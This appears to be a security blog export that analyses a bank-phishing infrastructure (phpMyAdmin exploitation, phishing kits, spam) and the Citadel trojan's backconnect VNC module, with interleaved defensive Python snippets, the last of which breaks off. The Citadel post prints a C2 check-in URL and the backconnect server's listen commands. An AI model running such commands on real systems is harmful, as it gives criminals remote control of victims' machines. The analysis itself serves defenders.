<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]-->
<br />
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">A site has been discovered containing a complete
infrastructure for preparing phishing attacks. On this criminal site all kinds of
malicious scripts, phishing kits, exploits and spam tools were found: everything
necessary to carry out fraudulent activities to steal credentials and obtain
confidential user data from banks and financial institutions in Europe, mainly in
Spain, the UK and Italy.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">With this amount of malicious material it is possible
to carry out the complete fraud lifecycle.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">Judging by the traces and comments in the malicious scripts,
this infrastructure appears to belong to Romanian criminal groups.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The criminals' workflow takes place in three stages:</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US"> </span></span></span> </div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The first stage is locating legitimate Internet servers that have the phpMyAdmin database management application installed in versions earlier than 3.3.10.2 and 3.4.3.1, which are vulnerable to certain exploits designed by the criminals to upload malicious code to the legitimate server.<br /></span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">To find those vulnerable phpMyAdmin servers, the
exploit script sends queries to the Bing search engine looking for web addresses that
contain the following directory paths in their URL:</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s400/myadmin.jpg" width="173" /></a></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">These malicious scripts exploit a weakness in the
server configuration options of the phpMyAdmin application to upload a PHP shell
that allows the criminals to take full control of the compromised machine.</span></span></span></div>
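<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">The defender's check that follows from the version numbers above: given the phpMyAdmin version running on each server you operate, decide whether it is older than the fixed releases this post names. The following is an added example, not code from the post or from the phpMyAdmin project. It reads the two version numbers as the fixed releases of the 3.3 and 3.4 branches (an interpretation of the post, consistent with its Spanish original further down this page) and assumes you already have each server's version string, for instance from your package manager; the hostnames and versions in the sample inventory are constructed.</span></span></div>

```python
"""Triage an inventory of phpMyAdmin installs against the fixed releases
named in the post (3.3.10.2 and 3.4.3.1).

Added example for this page, not code from the post or from the phpMyAdmin
project. It assumes you already know each server's phpMyAdmin version
(package manager, or the install's own version constant); collecting it is
outside this snippet."""

import re
from typing import Dict, Iterable, List, Tuple

# Fixed releases per branch, as stated in the post: on the 3.3 branch anything
# earlier than 3.3.10.2 is vulnerable, on the 3.4 branch anything earlier than
# 3.4.3.1. Stored as padded 5-tuples so they compare directly with parse_version().
FIXED_VERSIONS: Dict[Tuple[int, int], Tuple[int, ...]] = {
    (3, 3): (3, 3, 10, 2, 0),
    (3, 4): (3, 4, 3, 1, 0),
}

_NUMBER = re.compile(r"\d+(?:\.\d+)*")
_PRERELEASE = re.compile(r"-(?:alpha|beta|rc)\d*", re.IGNORECASE)


def parse_version(text: str) -> Tuple[int, ...]:
    """Normalise a version string to a 5-tuple of ints.

    '3.3.10' -> (3, 3, 10, 0, 0); 'phpMyAdmin 3.4.3.1-rc1' -> (3, 4, 3, 1, -1).
    The fifth element makes a pre-release sort below its final release, since an
    rc of 3.4.3.1 still predates the fix.
    """
    m = _NUMBER.search(text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    parts = [int(p) for p in m.group(0).split(".")][:4]
    parts += [0] * (4 - len(parts))
    parts.append(-1 if _PRERELEASE.search(text) else 0)
    return tuple(parts)


def assess(version_text: str) -> str:
    """Return 'vulnerable', 'fixed' or 'outside-stated-branches'.

    Branches the post does not name (2.x, 3.2, 3.5 and later) get the third
    verdict rather than a guess; check those against the project's own advisories.
    """
    version = parse_version(version_text)
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return "outside-stated-branches"
    return "vulnerable" if version < fixed else "fixed"


def triage(inventory: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Assess every (host, version) pair; vulnerable hosts come first."""
    rank = {"vulnerable": 0, "outside-stated-branches": 1, "fixed": 2}
    rows = [(host, ver, assess(ver)) for host, ver in inventory]
    return sorted(rows, key=lambda row: (rank[row[2]], row[0]))


if __name__ == "__main__":
    # Constructed inventory, not data from the post.
    sample = [
        ("db-legacy.example.test", "3.3.10.1"),
        ("db-web.example.test", "phpMyAdmin 3.4.3"),
        ("db-new.example.test", "3.4.4"),
        ("db-stage.example.test", "3.4.3.1-rc1"),
        ("db-next.example.test", "3.5.0"),
    ]
    for host, ver, verdict in triage(sample):
        print(f"{verdict:24} {host:28} {ver}")
```

<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Versions on branches the post does not mention are reported as outside-stated-branches rather than guessed at. A pre-release tag (rc, beta, alpha) is sorted below its final release, so 3.4.3.1-rc1 is still reported as vulnerable, and a short version such as 3.3.9 is padded with zeros before comparison so that it correctly sorts below 3.3.10.2.</span></span></div>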
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The next stage is basically the preparation of the phishing
pages for the target banks. The criminals use the PHP shell previously uploaded to the compromised
server to upload the phishing kit. This kit usually consists of a .zip compressed file
containing an exact clone of the website of the financial institution against which the criminals
want to carry out the phishing attack.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The main purpose of these phishing pages is to obtain
confidential credit card data from customers, pretending to be legitimate
requests from the bank to the client.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">For this reason the phishing pages imitate legitimate pages of
the bank, but the criminals are not interested in carrying out electronic banking fraud
operations. They use the phishing pages to obtain supplementary data from the customers' credit cards
and especially the ATM PIN code of the credit card. This ATM
PIN code is used to contract and activate financial services against the credit
card, which the criminals then use for fraudulent business transactions or
in electronic commerce.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kWIQJFfq_kE/UNRKnEC1RdI/AAAAAAAAAUQ/RVi35_lQ554/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="http://1.bp.blogspot.com/-kWIQJFfq_kE/UNRKnEC1RdI/AAAAAAAAAUQ/RVi35_lQ554/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s400/2.jpg" width="387" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s1600/popular.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s320/popular.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s320/7.jpg" width="221" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s320/5.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s400/4.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PgndYdOa1S0/UNROmxIS85I/AAAAAAAAAVk/2tjres0JZUU/s1600/wells2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-PgndYdOa1S0/UNROmxIS85I/AAAAAAAAAVk/2tjres0JZUU/s1600/wells2.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The last stage of the fraud is to launch a massive
spam campaign with emails containing the fake URLs where the phishing pages are hosted,
trying to trick users into visiting those fraudulent addresses and asking them to complete their confidential bank details.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The spam tools and the mailing lists used for spamming are
also hosted on the fraudulent server:</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s1600/wells.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s640/wells.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-35132335036394308882012-12-21T04:04:00.001-08:002012-12-21T04:09:25.624-08:00Criminal infrastructure for preparing phishing attacks<span style="font-family: "Arial","sans-serif";">A site hosted on Yahoo addresses has been discovered containing the complete infrastructure for preparing phishing attacks. On this criminal site all kinds of scripts, phishing kits, exploits and spam tools have been found, everything necessary to carry out fraudulent activities of credential theft and obtaining confidential data against banking institutions in Europe, mainly in Spain, the United Kingdom and Italy.</span> <br />
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s400/6.jpg" width="255" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">With such an amount of malicious material it is possible to carry out the complete fraud cycle.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">From the traces and comments that appear in the malicious scripts, everything indicates that this infrastructure belongs to criminal groups from Romania.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">The criminals proceed in 3 phases:</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">A first phase of locating on the Internet legitimate servers that have the phpMyAdmin database management application installed, in phpMyAdmin versions earlier than 3.3.10.2 and earlier than 3.4.3.1, which are vulnerable to certain exploits designed by the criminals to upload malicious code to the legitimate server.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s640/myadmin.jpg" width="276" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">To locate these vulnerable phpMyAdmin servers they use scripts to send queries to the BING search engine, looking for Internet addresses whose URL contains the paths shown in the image.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">These exploits take advantage of a weakness in the phpMyAdmin server configuration options to upload a PHP shell that allows the criminals to take control of the compromised machine.</span></div>
<span style="font-family: "Arial","sans-serif";">The next phase consists basically of preparing the phishing against the target banks. For this they use the shell hosted on the compromised servers to upload the phishing kit, which usually consists of a .zip file containing an exact clone copy of the financial institution against which they want to carry out the phishing. These kits are already prepared to send the data captured from the deceived users to certain mail addresses that the criminals have configured in the phishing scripts:</span> <br />
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">The main objective of these phishings is to obtain confidential credit card data from customers by pretending to be requests from the customer's bank, and above all to obtain the PIN or ATM code that is used to operate at cash machines and that, on many e-commerce sites and e-banking addresses, is used to contract financial services against that card, which the criminals later use to carry out fraudulent commercial transactions.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s320/3-B.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-OuST9rctgMk/UNRKhuEfpJI/AAAAAAAAAUI/FzondnFci_k/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/-OuST9rctgMk/UNRKhuEfpJI/AAAAAAAAAUI/FzondnFci_k/s400/1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s400/5.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s1600/popular.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s320/popular.jpg" width="320" /></a></div>
<a href="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s320/7.jpg" width="220" /></a><br />
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s400/4.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s400/2.jpg" width="387" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">The last stage of the fraud will consist of launching a spam campaign with emails containing the fake URLs where the phishing pages are hosted, to try to trick users into visiting these fraudulent addresses and filling in their confidential banking details.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">These spam tools, as well as the lists of mail addresses used for spamming, are also hosted on the fraudulent server:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s1600/wells.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s400/wells.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"><br /></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-88217433134963202562012-12-07T01:46:00.000-08:002012-12-07T02:46:16.867-08:00Trojan Citadel BackConnect VNC Server Manager<br />
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The Citadel Trojan kit includes a module that allows
criminals to connect remotely, using a VNC client, to users' computers infected
with the Citadel malware.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s1600/vnc3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="31" src="http://3.bp.blogspot.com/-hG7CVZiKngs/UME6Xpq0J_I/AAAAAAAAATE/-RwgopE3QBo/s400/vnc3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">This allows the criminals, once connected to the infected
machine, to carry out financial transactions from it. This makes the
fraudulent transfers undetectable by the banks' operational control systems,
because the transfers are made from the customer's legitimate IP address and legitimate
computer.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The VNC Manager kit is made up of the
following files:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s1600/vnc-good.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-ZuDOj5HY5aQ/UME6tGffOBI/AAAAAAAAATU/zEMXh85C1A4/s400/vnc-good.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The script “test.php” is used to check the connectivity of
the infected computer.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://winserv_php_gate/test.php?p1=13319&p2=23283&b=AKSERVER_D9FA7E50D0F76FCB<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The script code is as follows:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s1600/test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="http://1.bp.blogspot.com/-CPtlE4boLKE/UME60vwxRBI/AAAAAAAAATc/7bJCPv7XOEE/s400/test.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">Note that the file that opens the tunnel on
the specified ports is the executable cbcs.exe (Citadel Backconnect Server), an
updated version of the same application from the well-known ZeuS Trojan: zsbcs.exe
(ZeuS Backconnect Server).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The connection is initiated as follows:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">C:\>zsbcs.exe listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">C:\> cbcs.exe listen -cp:13319 -bp:23283<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Citadel Backconnect Server 1.2.0.0.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Build time: 13:12:41 07.12.2012 GMT.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Listening on IPv4 port 23283.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Listening on IPv4 port 13319.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Press Ctrl+C key to shutdown server.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Waiting for incoming connections (port of bot:23283,
port of client:13319)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Once the tunnel over the communication ports has been opened, the criminals can
connect remotely via VNC or execute commands on the infected user's
computer, gaining full control of the machine and its desktop. When the infected
user interacts with e-banking applications, the criminals can run scripts on the
infected machine to modify the customer's transactions and operate with the user
credentials previously captured by the Citadel Trojan's keylogger.<o:p></o:p></span></div>
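<div class="MsoNormal">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">Two artefacts in this post are directly usable by a responder: the test.php connectivity check (test.php?p1=...&p2=...&b=..., where p1 and p2 are the client and bot ports of the listen command above and b is the bot ID) and the backconnect server's log.txt, an excerpt of which appears further down in the post. The following is an added example, not code from the post or from the Citadel kit: it parses that log format into victim hostnames and port pairs for notification, and flags the test.php pattern in a URL so the same check can be run over the URL field of proxy or web-server logs. It assumes the log date is day-first (as in the server's own “Build time” line above) and that bot IDs have the hostname_16-hex-digits form seen in the excerpt; the sample lines are the three from the post's excerpt plus one constructed malformed line.</span></div>

```python
"""Parse the Citadel backconnect server's log.txt and spot its test.php
connectivity check in web logs.

Added example for this page, not code from the post or from the Citadel kit.
Assumes the log format shown in the post's log.txt excerpt
('[dd.mm.yyyy HH:MM:SS] BOTID, p1=<client port> ,p2=<bot port>'), that the
bot ID is '<hostname>_<16 hex chars>' as in the excerpt, and that the date is
day-first, matching the 'Build time' line in the post."""

import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Set
from urllib.parse import parse_qs, urlsplit

LOG_LINE = re.compile(
    r"^\[(?P<ts>\d{2}\.\d{2}\.\d{4} \d{2}:\d{2}:\d{2})\]\s*"
    r"(?P<bot>[^,\s]+)\s*,\s*p1=(?P<p1>\d+)\s*,\s*p2=(?P<p2>\d+)\s*$"
)
# Hostname, underscore, 16 uppercase hex digits (e.g. WOLF_7875768F483EE109).
BOT_ID = re.compile(r"^(?P<host>.+)_(?P<tag>[0-9A-F]{16})$")


@dataclass
class BackconnectEntry:
    seen: datetime
    bot_id: str
    hostname: str
    client_port: int  # p1: port the operator's VNC client attaches to (-cp)
    bot_port: int     # p2: port the infected machine connects back to (-bp)


def parse_line(line: str) -> Optional[BackconnectEntry]:
    """Return an entry for a well-formed line, None for anything else."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    ident = BOT_ID.match(m.group("bot"))
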